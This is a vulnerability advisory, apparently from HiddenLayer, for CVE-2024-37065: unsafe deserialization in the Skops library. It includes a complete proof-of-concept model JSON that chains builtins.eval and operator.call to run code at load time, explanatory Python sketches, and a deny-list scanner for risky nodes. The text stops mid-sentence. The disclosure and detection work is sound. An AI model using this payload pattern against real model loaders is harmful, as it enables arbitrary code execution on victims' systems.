HiddenLayer is the leading provider of Security for AI. Its security platform helps enterprises safeguard the machine learning models behind their most important products. HiddenLayer is the only company to offer turnkey security for AI that does not add unnecessary complexity to models and does not require access to raw data and algorithms. Founded by a team with deep roots in security and ML, HiddenLayer aims to protect enterprises' AI from inference, bypass, and extraction attacks, as well as model theft. The company is backed by a group of strategic investors, including M12, Microsoft’s Venture Fund, Moore Strategic Ventures, Booz Allen Ventures, IBM Ventures, and Capital One Ventures.
June 4, 2024
Model Deserialization Leads to Code Execution
CVE Number
CVE-2024-37065
Summary
When loading nodes of type OperatorFuncNode, Skops allows a model to call functions from the operator module, specifying both the function and the arguments passed to it. An attacker can use this to craft a malicious model that achieves arbitrary code execution when the model is loaded and compiled.
Products Impacted
This vulnerability is present in Skops v0.6 and newer.
CVSS Score: 7.8
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
This vulnerability breaks down into two main components: the ability to load arbitrary functions into memory, and the ability to call a function in the operator module. The first can be done by creating a node of type TypeNode that pulls in any function you want, such as the builtin eval function:
{
  "__class__": "eval",
  "__module__": "builtins",
  "__loader__": "TypeNode",
  "__id__": 1
}
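To make the first component concrete, here is a minimal sketch of what resolving such a node amounts to. The helper `resolve_type_node` is hypothetical and is not Skops's actual implementation; it only assumes that the loader imports the module named in `__module__` and looks up the name in `__class__` on it.

```python
import importlib


def resolve_type_node(node: dict):
    """Hypothetical stand-in for a TypeNode loader (an assumption, not Skops code).

    Imports the module named in the node and returns the attribute it names.
    """
    module = importlib.import_module(node["__module__"])
    return getattr(module, node["__class__"])


node = {
    "__class__": "eval",
    "__module__": "builtins",
    "__loader__": "TypeNode",
    "__id__": 1,
}

resolved = resolve_type_node(node)
# Nothing restricts the lookup to classes, so the builtin function comes back.
print(resolved is eval)
```

Under that assumption, a node that claims to describe a type can hand back any importable callable.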
Because we can load functions into memory, we can exploit the loading system if we can also call them with arguments of our choosing. That call happens when an OperatorFuncNode node is compiled.
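A minimal sketch of what that compilation step amounts to, assuming the node looks up the named function in the operator module and calls it with the unpacked contents of its attrs tuple. The function `construct_operator_func` is a hypothetical name used for illustration and is not taken from the Skops source; the example uses the harmless `itemgetter`.

```python
import operator


def construct_operator_func(name: str, attrs: tuple):
    """Hypothetical model of OperatorFuncNode compilation (an assumption).

    Looks `name` up in the operator module and calls it with the unpacked attrs.
    """
    func = getattr(operator, name)
    return func(*attrs)


# Benign use: build an itemgetter that fetches index 1.
getter = construct_operator_func("itemgetter", (1,))
print(getter(["a", "b", "c"]))
```

The point of the sketch is that both the function name and its arguments come from the model file, so whoever writes the file chooses what gets called.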
Python 3.11 and later provide a function in the operator module named call, which calls a function passed to it. We therefore need a model that grabs the call function and passes it the eval function together with the code we want to run:
{
  "__class__": "call",
  "__module__": "",
  "__loader__": "OperatorFuncNode",
  "attrs": {
    "__class__": "tuple",
    "__module__": "builtins",
    "__loader__": "TupleNode",
    "content": [
      {
        "__class__": "eval",
        "__module__": "builtins",
        "__loader__": "TypeNode",
        "__id__": 1
      },
      {
        "__class__": "str",
        "__module__": "builtins",
        "__loader__": "JsonNode",
        "content": "\"print('pwned by Abraxus from HiddenLayer')\"",
        "__id__": 5,
        "is_json": true
      }
    ],
    "__id__": 8
  },
  "__id__": 0,
  "protocol": 1,
  "_skops_version": "0.10.dev0"
}
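Given the two components described in this section, loading this payload effectively reduces to `operator.call(eval, "<attacker code>")`. The sketch below shows that reduction with a harmless arithmetic expression in place of the payload string. The fallback lambda is an assumption added only so the example also runs on interpreters older than Python 3.11, where `operator.call` does not exist.

```python
import operator

# operator.call(obj, *args, **kwargs) exists in Python 3.11+.
# The fallback is an illustrative equivalent for older interpreters.
call = getattr(operator, "call", lambda obj, *args, **kwargs: obj(*args, **kwargs))

# What the payload's tuple contents resolve to: (function, argument).
# A benign expression stands in for the attacker-controlled string.
attrs = (eval, "1 + 1")

result = call(*attrs)
print(result)
```

With the original payload string, the evaluated expression is a `print(...)` call, which is why the load prints the message and yields None.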
When loaded with the trusted parameter set to True, or with the trusted types set to all unknown types, the model executes the code and returns None. Both examples in the library's usage tutorial (scikit-learn documentation) would allow code execution.
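Since a trusted load runs the payload, one defensive option is to inspect the schema before loading it. The following is a rough sketch only: `find_suspicious_nodes` and the `DANGEROUS_BUILTINS` deny-list are hypothetical, the list is not exhaustive, and the sketch assumes the schema has already been parsed into a Python dict. It flags the two node shapes used in the payload above and should not be read as a complete defence.

```python
# Hypothetical, non-exhaustive deny-list used for illustration only.
DANGEROUS_BUILTINS = {"eval", "exec", "compile", "__import__", "open", "getattr"}


def find_suspicious_nodes(node, path="$"):
    """Walk a parsed schema and return (path, reason) pairs for risky nodes."""
    findings = []
    if isinstance(node, dict):
        loader = node.get("__loader__")
        cls = node.get("__class__")
        if loader == "OperatorFuncNode" and cls == "call":
            findings.append((path, "OperatorFuncNode resolving operator.call"))
        if (
            loader == "TypeNode"
            and node.get("__module__") == "builtins"
            and cls in DANGEROUS_BUILTINS
        ):
            findings.append((path, f"TypeNode resolving builtins.{cls}"))
        # Recurse into every value so nested nodes are checked too.
        for key, value in node.items():
            findings.extend(find_suspicious_nodes(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for index, item in enumerate(node):
            findings.extend(find_suspicious_nodes(item, f"{path}[{index}]"))
    return findings


# Trimmed version of the payload from this advisory.
schema = {
    "__class__": "call",
    "__module__": "",
    "__loader__": "OperatorFuncNode",
    "attrs": {
        "__class__": "tuple",
        "__module__": "builtins",
        "__loader__": "TupleNode",
        "content": [
            {"__class__": "eval", "__module__": "builtins", "__loader__": "TypeNode"},
            {"__class__": "str", "__module__": "builtins", "__loader__": "JsonNode",
             "content": "\"1 + 1\"", "is_json": True},
        ],
    },
}

findings = find_suspicious_nodes(schema)
for path, reason in findings:
    print(path, "->", reason)
```

A deny-list like this is easy to bypass with other callables, so an allowlist of expected types is generally the safer design; the sketch only illustrates where in the schema the dangerous pieces sit.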
However, even security-minded users can still be exploited, because multiple parts of the codebase call load and loads with trusted set to True from inside another function. One example is the update command-line tool: